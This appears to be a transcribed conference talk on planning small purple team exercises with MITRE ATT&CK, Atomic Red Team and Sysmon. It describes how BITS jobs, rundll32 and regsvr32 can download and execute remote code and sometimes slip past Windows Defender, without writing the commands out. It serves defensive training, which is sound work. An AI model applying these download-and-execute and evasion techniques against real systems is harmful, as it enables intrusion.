Red + Blue = Purple: How to execute purple team exercises even if you think you can't

I'm a retired Colonel of the Greek Armed Forces. I work in the IT operations area since 2002 and since 2008 I joined the Cyber Defense Directory where I gained my expertise and my background around cyber security domain. Part of my experience is the cyber security operations in multiple forms, both offensive and defensive, and of course planning, coordination and executing cyber defense exercises. And I'm insisting on that because it has to do with the content of the presentation. Since 2017, when I retired, I changed the career path from public sector and defense forces to the challenging private sector and I'm really happy that I had that opportunity to try my skills, my knowledge and to put effort in this very

challenging sector. So since last year I joined Digital Shadows, a cyber threat intelligence and digital risk monitoring company providing services, business services for big vendors, our clients, 50% are banks and funding and so on. My expertise as part of the security engineering team and research team is adversary simulation and TTPs analysis, purple team exercises, security monitoring and recently internal security architecture. What we will see today is purple team exercises. There are already mentions for the purple team term already during the previous talks and pretty much everyone is familiar. It's getting more and more popularity the term purple team because during the past time doing different security assessments like penetration test, vulnerability assessments, red teaming and so on,

we found, a security community found that the most efficient and valuable way for blue teams, for the clients of pen testers and red teamers is to do something in combination. So what we are here to do today is To examine the topic from what perspective? Cyber security exercises are a great way to improve your security. We are talking about open-teaming, but the point is to put it in a more formal way, in a cyber defense exercise. Because this can be used as part of your, of our ISMS program to trigger, to boost additional security improvements, measures, controls, countermeasures and buy security stuff. Improve the security budget. That's the... the world out there. Red teaming is currently the advanced way to simulate cyber

attacks, already covered. Blue teaming is always the main exercise objective, which is what? Catch the Reds. This is the objective every time. Purple teaming comes to combine all the above in a win-win approach. So the challenge here is what? How can we make it part of our information security management program? and not just a detection test. How can we plan and execute in a small scale without advanced expertise? Red teaming is good, purple teaming is good, but it is expensive to hire the right people, the team, to do a large scale red team exercise and to report and find everything. The point here is how with our own resources can do small tests in the

format of a purple team exercise to formalize the results and improve and justify our recommendations or requirements or requests for security tools and technology terminology From Wikipedia, okay, we have seen a lot of different definitions. A red team is an independent group that challenges an organization to improve its effectiveness by assuming an adversarial role of point of view. So red teaming is not only not to get caught but also to act as an adversary. That's why threat intelligence now has been raised and has shared a lot of information around adversaries tactics In order to achieve what? To give to the blue teams, to give to the exercise objectives the needed information to conduct exercises close to reality, close to the real world.

Blue Team is a group of individuals who perform an analysis of information systems, identify security flaws, verify the effectiveness of a security measure and to make certain or all security measures that will continue to be effective after implementation. Pretty much crystal clear. We don't need more comments on that. Purple team is a combination of both existing and blue team members work together. So by purple teaming, the term purple team does not include a new team. Actually, it is a process that joins members of both teams together to work together and gain the most value out of a purple team exercise, of a cyber defense exercise. What is a cyber security exercise? Which most of us are very familiar but we all

know especially here in Greece Panoptis is the annual cyber defense exercise coordinated and organized by the Ministry of Defense. I was part of this exercise even from the first one during my years in MOD. But as far as I know, it is the only cyber defense exercise here in Greece and I don't know any smaller scale exercise. And the way that this exercise is so much popular means that anyone, everyone in the security community needs the concept of cyber defense exercise to get trained, to prove things, to improve their skills. Why we need a cyber defense exercise? To test and exercise plans, processes and procedures. What plans, processes and procedures? The IT security, the cyber security plans, processes and procedures. This is what always

cyber exercises and in general where the military community exercises are organized for. How? There are those five key stages: Plan, Prepare, Execute, Report and Lessons Learned. And this is how the presentations will... the path that will follow to help us to understand the concept of doing a Purple Team Exercise with our resources or with minimal assistance. Purple Team Exercises, what do they require? Red Team Expertise, hard to find in the market and very expensive. Blue-time expertise, again this is something very very challenging because most of the times IT and security do not have the time to test their detection capabilities and the effectiveness of the security measures. Exercise planning, who has the skills and qualifications to plan an exercise in the background. Budget, expensive and time.

who has much time, enough time to do something in addition on top of his or her current information security program. What are the red team requirements now? Attack framework, tools, human resources, expertise, preparation, time, attack plan. We see some things here that are really, really important. necessary for a team but from those things from those requirements we can identify those that can be used with our own resources that's the purpose okay i do not want to underestimate the value of the advanced or sophisticated red teaming and red team exercises okay don't confuse the concept with that We don't replace the value of a large-scale red team exercise. We just want to adjust in a smaller scale,

in a more frequent way and approach something that can improve our security posture. Blue requirements: Incident Response Plan is the main plan that is being tested during every cyber security exercise. Security controls, monitoring capabilities and detection capabilities. This is what we often suffer because of the large scale of false positives and other issues. Response capabilities, security response skill set. Even if we have a dedicated incident response team, we need response plan and skill set. and applied security policies. Do we have a policy associated with the detection and monitoring and who is responsible to respond, etc. The problems, the red problem. Attack kill chain is complicated. Usually very frequent the red teams make use of the popular

attack kill chain which is actually, we will see later what are the stages, it is how an adversary, how normally an attack campaign takes place. What are the phases from reconnaissance to data exfiltration, how an attacker can have access and what are the phases during that campaign to achieve its targets. Many different tools and techniques applied. Hard to plan and design attacks. Advanced expertise needed for execution. We need tools, we need resources. Time limitations and budget limitations. Again, I'm talking about the red problem in-house. Not about the advanced or expert already expertise red teams. The blue problem. Preparation time not enough available. We don't have enough time to prepare for a specific cyber defense exercise It is hard to find free time for every IT support or security

personnel IT blue team not available lack of experience When I say IT or blue team I'm talking about incident response team. Okay, lack of response plan or capabilities Testing exercise environment not available. We are used when we are doing cyber defense exercises where participants in cyber defense exercises to have access to cyber range, to a testing framework, to a testing machine, to a testing environment to do stuff. In our organizations we don't have such capability. So we have to find a way how to test things in a smaller scale. Time limitations and budget limitations always Wrong button, sorry And the purple problem The greatest of all Okay In this Image, you see the concept behind

red and blue. Red, I will own you. Blue, I will catch you or I will make you cry. What is the perfect problem? To make those enemies work together. Okay, get together reds and blues in a common effort to improve what? To improve the cybersecurity posture of blues. Don't forget, reds are the clients. of blues right? These were who they are working for okay so it is let's say it should be by default by definition the right way of approach planning phase. Where to start from in order to organize a purple team or a cyber defense exercise. We need those things. To define the exercise objectives, what exactly, what process, what plan I want to test or what

people, what resources, what measures, what technology. Define the involved entities. There's no need to be a full-scale exercise. We don't necessarily need to organize an exercise to engage the entire organization. Small parts each time. Define the attack scenario to be based. Select the associated tactic for the attack scenario. And this now will go how we will solve the red problem with the following ways. Select one or more techniques according to the available time and expertise. We said before that a red team normally represents or replicates an already existing known adversary attack method. So what we want from our side to replicate is red teaming techniques and tactics to replay those scenarios. Define the target security conversion processes. We don't need to engage

the entire, the whole sensor across the company or the organization. Okay, we can limit the target to small pieces. Prepare the testing boxes and communicate the exercise. This is the key part. We try and the message is to evolve from the custom, from the normal weekly, monthly detection lab or detection test to a more formal, let's say quarterly based purple team exercise where our detection tests will be communicated and escalated properly to the management for our requirements. Recommend approach, part red. Attack framework. The MITRE ATT&CK framework. It's a new, relevant new framework since last year that tries to map all the techniques already recognized by the community, identified by several analysis from APT attacks, attack reports and anything

and within a way to include, to contain every known technique and tactic that the adversaries normally use. Automated Adversarial Simulation, this is something more advanced, it is a next step. Caldera framework tries to do exactly this, to automate not just one technique or attack selected but a chain of techniques or tactics used from a start point to a specific end point. Prepare only the associated security controls. With IT support and by enabling monitoring or CM for the specific part section. We can use a spare laptop and we will see how we can do that to do a small scale exercise. And a couple of words for the ATT&CK framework. Who knows the ATT&CK framework? The

MITRE ATT&CK framework. Ok, it seems that it's not very popular. This is the wiki page. Please go there, you will find much very valuable information for attack tactics and techniques. Most of them are there, of course there are also other custom or not already identified techniques but this is a very good starting point for every security professional, for every IT or blue team to see what are the techniques and tools that attackers used. Because what actually Dimitris before very successfully described, okay, an APT actor It is something that really exists but here you can see a lot more. Feasible approach: Select one tactic each time. We don't need to test everything from reconnaissance to data exfiltration. Just focus on one tactic. One tactic with

pre-selected associated techniques and tools can be prepared easily. Make use of the available simulation frameworks. And this is the second part that actually is really, really useful. We have the ATT&CK framework, but we have another tool that will help us make this feasible. Several limitations may apply. We may not have a command and control simulation. We may not even have exploitation. But we have to simulate specific parts of the scenario and focus on the things that we need to test. Basic security controls can be tested and evaluated efficiently. And this is our goal. Start from the basics. Testing environment can be a spare laptop workstation reflecting or representing an average user joining the corporate network. We don't need a cyber range. Even a laptop properly configured

and prepared with a test user by IT support given to the team, to the IT security team, to the IT security specialist, to one guy to do the test is more than enough for this limited scale exercise. And of course monitoring, detection, response, and many testing scope. This is the main part that we need to test. Okay, it's more easy, the point is that it's easier to test the perimeter, the web application, and so on. But where the organization suffers is the internal security measures to mitigate lateral movement and other techniques that take place inside the network. This is a sensitive point. Those are the tactics. that are described in detail in the ATT&CK framework.

You see we start from initial access, execution, persistence, privilege escalation, defense evasion, credential access, discovery, lateral movement collection, exfiltration and command and control. Recently the ATT&CK framework has been expanded to the pre-ATT&CK framework where you can find a list of tactics for the phase before the initial access including reconnaissance and so on. As an example, using for my testing, defensive version tactics can be used. For example, here we can see that the defensive version tactics only itself has 57 different techniques, okay? Each technique is described accordingly and the following step is what? We have the ATT&CK framework but somebody would say okay and how now where will I will find the tools and the techniques to simulate the adversary? We have the Atomic Red Team

which is a project, a new project that actually does what? Maps the attack framework to tools, techniques and commands that can be just copied and pasted to my environment and do some basic tests. We see how those are mapped, okay, each technique with the test associated. We can, as a next step is to select the techniques for the selected tactic In this example we selected four different techniques. The approach for blue and red I will skip it. Okay, it is something that has been already stated but now in the preparation phase it is the time for review and checks of the controls. I will skip the preparation because here what I want to show you is what I used for the testing and

this is something that also recommended for a small scale exercise. You can start even from a Windows 10 professional and laptop that joins the network with the default antivirus the Windows Defender if there is no else existing. Initial logging default, I will go straight to the next logging system which is Sysmon already mentioned by Dimitris before as a very valuable and efficient way for detection and since almost every antivirus and EDR can be bypassed logging is our last way for detection and mitigating the threats. Okay, and just to give you a couple of examples for the during the execution phase and how those tools or commands can be executed. One example is the BITS jobs, the Windows Background Intelligence Service, which

can be used for a sequence file mechanism. transfer, file transfer mechanism. Adversaries may abuse BIT to download execute or even clean up after malicious code. This is the test that is described in Atomic Red Team framework. This is the command and this is the result. Apologies for not being clear. You will see that in the slide more detail. The point is that we managed to download and execute the putty.exe directly from the website. This is what Sysmon has detected as a new process created. Okay, and the valuable thing, the key part here is okay, we see that many processes can be detected as newly created. The point with already these existing intelligence part of techniques that are being exposed is that we can

create, we can improve our rules because those techniques are not random, they have been somehow detected in the past, identified during previous attacks and that's the value. This is the indirect command execution. I will not stand here. I will stand here to see a very useful example. I don't know if you're familiar with the run DLL32 technique of executing commands. Here we can see already available in the site how we can execute JavaScript to remote download and execute something. This is the ready to go a command from the side and this is the result the result mind here that the Windows Defender detected the download and execute of this script but actually what it does is to try to

download and execute calculator from the atomic red team website The interesting part here that you can see the value of different techniques is that with this technique, the fourth one, the RECS-SVR32, a command line program used to register and unregister object linking and embedding controls. Okay, these are the descriptions from the site. These are, here you can see the commands, okay, pretty trivial. You can see here how the script is executed locally, successfully, how the sysmon detects. And here, this is also the interesting part, REC SVR to download and execute the T1085 script. You see this is a different technique. This is a technique that used before by RUN DLL 32. Before with RUN DLL was detected but now with a different technique is not detected by

Windows Defender which means that those techniques are real existing, have been used and maybe still be used by attackers. And this is how we can evaluate, okay, that a technique, a specific technique belonging to a specific tactic can work or not. The other useful here is that besides the process creation, we have also the network connection, been detected by Sysmon again, for the attempt to download and execute the file from the remote resource. What is useful to do during a purple team exercise and this is I will conclude my presentation is that we need to develop a table matrix with the techniques the tactics, techniques used and what are the tools that we have used and the measures, controls that we have used

in parallel with the Red Team. This actually reflects the collaboration, the Red and Blue Team working together. On the left part Usually we have the red team tactics, attempts, activities and on the right part, the right columns include what the blue measures, controls did during each tactic, each technique. And here we see the tools, the commands that we used, if the AV detected or not. what happened from logging perspective and if they were applicable in a more advanced exercise, what alert has been generated by our CM or log management tool and what response has been triggered and completed or not during the response phase of the cyber defense exercise. Next steps improvements, Caldera, a very good framework for automation of the techniques that we

described before And attack playbooks, this is a new effort to try to emulate adversary's plans, meaning from the beginning to the end state, which tools and techniques in a specific playbook can be described in an adversary's campaign attack, no, there is already prepared ready for you, for all of us to use as a reference the APT3 Adversary Emulation Plan. Okay, and we can see here that there is additionally the manual where in the XLS file we can see all tactics and tools that have been used and here in the more viewer user-friendly format playbook by Unit 42 threat intelligence company Next steps, of course next steps could include okay here the more advanced tools. We will not skip them still we

can use Metasploit, Empire, Cobalt Strike, okay where available but this raise the expertise requirements and expectations from Red Team and automated response it's also something that as a next step can be used to improve and test Key takeaways. Okay, what we need to remember today, after today. Use purple team exercises to identify the security gaps. Already told many times, it's really really useful. Improve your detection and response capabilities. Use publicly available tools, frameworks that make the plan and execution easier. This is the key message. There are tools, there are frameworks, there are ways to make limited exercises to formalize the results of a detection test. Prove the value of the gap of your security controls. This is why we make the test. It's not something written

that, okay, there is that vulnerability that might expose my asset, my data, whatever. Here we have metrics, and this is what value most of the times in management. We can build metrics and measure the effectiveness of our security controls. Trigger or boost your ICMS program. Make small cyber, private team exercises as part of your program to improve the way you justify, you request security controls and measures. And keep it short and simple. We don't need only... It's very good to have an annual full-scale cyber war game defense exercise and so on. Okay, but we can make it in a more limited, controllable way, short, simple, and it's time to build more and more on top of that. Thank you.